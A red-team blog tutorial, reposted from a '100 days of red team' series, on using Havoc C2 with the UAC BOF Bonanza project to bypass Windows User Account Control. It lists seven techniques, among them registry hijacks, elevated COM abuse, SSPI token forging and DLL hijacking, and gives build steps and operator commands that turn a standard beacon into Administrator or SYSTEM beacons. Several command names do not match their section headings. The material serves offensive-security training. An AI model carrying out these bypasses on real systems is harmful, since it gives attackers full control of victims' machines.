Using Havoc C2 to bypass UAC

Note: This was first published on https://100daysofredteam.com as a series of posts.

For this demonstration, I will be using Matthew David’s UAC BOF Bonanza project. This project combines multiple UAC bypass techniques into a Beacon Object File (BOF) that can be used with Havoc C2. I will be demonstrating following techniques:

• SilentCleanupWinDir — Modifies the “Environment\windir” registry key and executes the SilentCleanup scheduled task via schtasksrun by @TrustedSec.
• RegistryShellCommand — Modifies the “ms-settings\Shell\Open\command" registry key and executes an auto-elevated EXE (ComputerDefaults.exe).
• SspiUacBypass — Forges a token from a fake network authentication though SSPI Datagram Contexts. It will then impersonate the forged token and use CreateSvcRpc by @x86matthew to create a new SYSTEM service. Original research and code is from @splinter_code.
• TrustedPathDLLHijack — Creates fake windows directory C:\Windows \, copies supplied DLL to location, and executes auto-elevated EXE (ComputerDefaults.exe).
• CmstpElevatedCOM — Creates an elevated ICMLuaUtil COM object and calls its ShellExec function to execute the provided file on disk.
• ColorDataProxy — Creates an elevated ICMLuaUtil COM object and calls its SetRegistryStringValue function to write the location of the provided file to the DisplayCalibrator registry value residing in HKLM. It will then create an elevated IColorDataProxy COM object and call its LaunchDccw function, resulting in the execution of the provided file.
• EditionUpgradeManager — Modifies the “Environment\windir” registry key, creates a elevated IEditionUpgradeManager COM object, and then calls the AcquireModernLicenseWithPreviousId function from the elevated COM object to execute the provided file.

I am using Debian 12, Ubuntu 24.04, Havoc C2 0.7 and Windows 10 target for this demonstration. I am assuming that there’s already a beacon from a Windows 10 machine calling back to Havoc C2.

Note: I am using Debian 12 with mingw-w64 version 10 or higher (along with build-essentials) to compile the project as per Matthew’s recommendation.

Install build-essentials and mingw-w64 on Debian 12:

sudo apt install build-essential
sudo apt install mingw-w64

Clone the project using the following command:

git clone https://github.com/icyguider/UAC-BOF-Bonanza.git

Compile the project:

cd UAC-BOF-Bonanza
make

Successfully compiled the project on Debian 12

To load this in Havoc C2, go to Scripts → Script Manager → Load Script and select the Havoc-UACBypass.py file.

Loading the BOF in Havoc C2

I am assuming that there’s already a beacon from a Windows 10 machine calling back to Havoc C2.

Havoc C2 beacon running with standard privileges

To see available UAC bypass options, issue the following command:

help uac-bypass

UAC Bypass options in UAC Bypass Bonanza

UAC bypass via silentcleanup technique

To see the command format use

help uac-bypass silentcleanup

Help menu for silentcleanup UAC bypass technique

To use this technique, we need a locally stored EXE file that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2.

Let’s execute this technique:

uac-bypass trustedpath /home/rt/uac.exe

Executing silentcleanup UAC bypass technique

Received a beacon running with administrator privileges

UAC bypass via sspidatagram technique

To see the command format use

help uac-bypass sspidatagram

Help menu for sspidatagrap UAC bypass technique

To use this technique, we need an EXE file, stored on the target machine, that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2. For this demo, I will use the one that I already have on the target machine.

Let’s execute this technique:

uac-bypass sspidatagrap C:\Users\rt\Downloads\uac.exe

Executing sspidatagram UAC bypass technique

Received a beacon running with SYSTEM privileges

UAC bypass via registrycommand technique

To see the command format use

help uac-bypass registrycommand

Help menu for registrycommand UAC bypass technique

To use this technique, we need an EXE file, stored on the target machine, that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2. For this demo, I will use the one that I already have on the target machine.

Let’s execute this technique:

uac-bypass registrycommand C:\Users\rt\Downloads\uac.exe

Executing registrycommand UAC bypass technique

Received a beacon running with Administrator privileges

UAC bypass via trustedpath technique

To see the command format use

help uac-bypass trustedpath

Help menu for trustedpath UAC bypass technique

To use this technique, we need a locally stored DLL file that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2.

Let’s execute this technique:

uac-bypass trustedpath /home/rt/uac.dll

Executing trustedpath UAC bypass technique

Even though the execution was successful, I did not receive an elevated beacon. Maybe I need to use a different DLL.

UAC bypass via elevatedcom technique

To see the command format use

help uac-bypass elevatedcom

Help menu for elevatedcom UAC bypass technique

To use this technique, we need an EXE file, stored on the target machine, that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2. For this demo, I will use the one that I already have on the target machine.

Let’s execute this technique:

uac-bypass elevatedcom C:\Users\rt\Downloads\uac2.exe

Executing elevatedcom UAC bypass technique

Received a beacon running with Administrator privileges

UAC bypass via colordataproxy technique

To see the command format use

help uac-bypass colordataproxy

Help menu for colordateproxy UAC bypass technique

To use this technique, we need an EXE file, stored on the target machine, that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2. For this demo, I will use the one that I already have on the target machine.

Let’s execute this technique:

uac-bypass colordataproxy C:\Users\rt\Downloads\uac2.exe

Executing colordataproxy UAC bypass technique

Received a beacon running with Administrator privileges

UAC bypass via editionupgrade technique

To see the command format use

help uac-bypass editionupgrade

Help menu for editionupgrade UAC bypass technique

To use this technique, we need a locally stored EXE file that contains our payload. If you don’t have one, you can generate it using Attack → Payload menu in Havoc C2.

Let’s execute this technique:

uac-bypass editionupgrade /home/rt/uac2.exe

Executing editionupgrade UAC bypass technique

Received a beacon running with Administrator privileges

This technique is relatively more expensive due to following reasons:

• The beacon used to execute this technique became unresponsive.
• Even if you manage to land another beacon on the target machine, this technique cannot be reused without rebooting it.

editionupgrade technique failed to execute second time

Red Team Notes
- Matthew David’s UAC Bypass Bonanza can be used to bypass User Access Control on Windows machines and execute code with elevated privileges.
- Shout out to Matthew David (Icyguider) for helping me out with this.

Follow my journey of 100 Days of Red Team on WhatsApp, Telegram or Discord.

References

• Exploring Windows UAC Bypasses
• UAC Bypass via ICMLuaUtil Elevated COM Interface
• UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface
• Bypassing UAC with SSPI Datagram Contexts
• Bypassing UAC Using Registry Keys
• UAC Bypass by Mocking Trusted Directories